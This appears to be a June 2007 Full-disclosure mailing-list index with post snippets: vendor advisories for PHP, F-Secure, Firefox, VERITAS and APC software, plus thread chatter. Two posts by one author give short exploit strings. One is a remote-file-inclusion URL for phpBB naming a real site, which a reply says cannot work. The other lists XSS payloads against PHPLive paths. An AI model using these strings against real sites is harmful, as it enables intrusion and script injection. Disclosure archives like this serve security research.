Re: [Full-disclosure] Palimm Palimmm

2007-06-01 Thread Dëêþàñ Çhäkrãvârthÿ
mailing-lists wrote: > I think I read this before... :) > > RMS > > How do I read this message ? >> -BEGIN PGP SIGNED MESSAGE- >> Hash: SHA1 >> >> 5DFFC7C3DCFBCED5CEDD48F216936CF9 >> 9B704583D6E5056E67C959B5CCEE2F548D3C70F3 >> >> 3ABC8C9964BDBB6E8521E58C641B4812 >> AD1C3B3CC1E821CA8D91E7

[Full-disclosure] SEC Consult SA-20070601-0 :: PHP chunk_split() integer overflow

2007-06-01 Thread Gerhard Wagner
SEC Consult Security Advisory < 20070601-0 > === title: PHP chunk_split() integer overflow program: PHP vulnerable version: < 5.2.3 impact:

[Full-disclosure] n.runs-SA-2007.013 - F-Secure Antivirus LZH parsing BufferOverflow Advisory

2007-06-01 Thread security
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.013 01-Jun-2007 Vendor:F

[Full-disclosure] static XSS / SQL-Injection in Omegasoft Insel

2007-06-01 Thread MC Iglo
Input passed to fields in OmegaMw7's tables isn't properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site and/or inject SQL-Commands This applies to many many standard fields in

[Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT

2007-06-01 Thread dr . rezen
New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week: victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00 For example: http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00 Enjoy :) BUG BY REZEN! XORCREW! H4

[Full-disclosure] PHPLive ALL VERSION: RFI + XSS

2007-06-01 Thread dr . rezen
There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others) /phplive/chat.php?sid=alert(123); /phplive/help.php?LANG[DEFAULT_BRANDING]=alert(123); /phplive/help.php?PHPLIVE_VERSION=alert(123); /phplive/admin/header.php?admin[name]=alert(123); /phplive/super/info.php?BASE_URL=alert(123)

[Full-disclosure] [OpenPKG-SA-2007.020] OpenPKG Security Advisory (php)

2007-06-01 Thread OpenPKG GmbH
ion: Corrected Branch: Corrected Package: OpenPKG Enterprise E1.0-SOLIDapache-1.3.37-E1.0.6 OpenPKG Enterprise E1.0-SOLIDphp-5.1.6-E1.0.4 OpenPKG CommunityCURRENT apache-1.3.37-20070601 OpenPKG CommunityCURRENT apache2-php-5.2.3-20070

Re: [Full-disclosure] Palimm Palimmm

2007-06-01 Thread poo
knock your head into a wall 3 times and look in a mirror On 6/1/07, Dëêþàñ Çhäkrãvârthÿ <[EMAIL PROTECTED]> wrote: mailing-lists wrote: > I think I read this before... :) > > RMS > > How do I read this message ? >> -BEGIN PGP SIGNED MESSAGE- >> Hash: SHA1 >> >> 5DFFC7C3DCFBCED5CEDD48F21

[Full-disclosure] APC PowerChute Network Shutdown 2.21 is vulnerable to directory transversal

2007-06-01 Thread guiness . stout
Synopsis: APC PowerChute Network Shutdown 2.21 is vulnerable to directory transversal Background: APC PowerChute Network Shutdown is used to perform graceful shutdowns of network servers from one main server. Affected Versions: <= 2.21 build 116 Description: APC PowerChute Network Shutdown i

Re: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT

2007-06-01 Thread Slythers Bro
i saw that in functions_post.php : if (!defined ('IN_PHPBB ')) { die('Hacking attempt'); } so this RFI can't work ___ Full-Disclosur

[Full-disclosure] [USN-468-1] Firefox vulnerabilities

2007-06-01 Thread Kees Cook
=== Ubuntu Security Notice USN-468-1 June 01, 2007 firefox vulnerabilities CVE-2007-1362, CVE-2007-2867, CVE-2007-2868, CVE-2007-2869, CVE-2007-2870, CVE-2007-2871 === A se

[Full-disclosure] iDefense Security Advisory 06.01.07: Symantec VERITAS Storage Foundation Administration Service DoS Vulnerability

2007-06-01 Thread iDefense Labs
Symantec VERITAS Storage Foundation Administration Service DoS Vulnerability iDefense Security Advisory 06.01.07 http://labs.idefense.com/intelligence/vulnerabilities/ June 01, 2007 I. BACKGROUND The VERITAS Storage Foundation is made up of the Veritas File System, Veritas Volume Replicator (VVR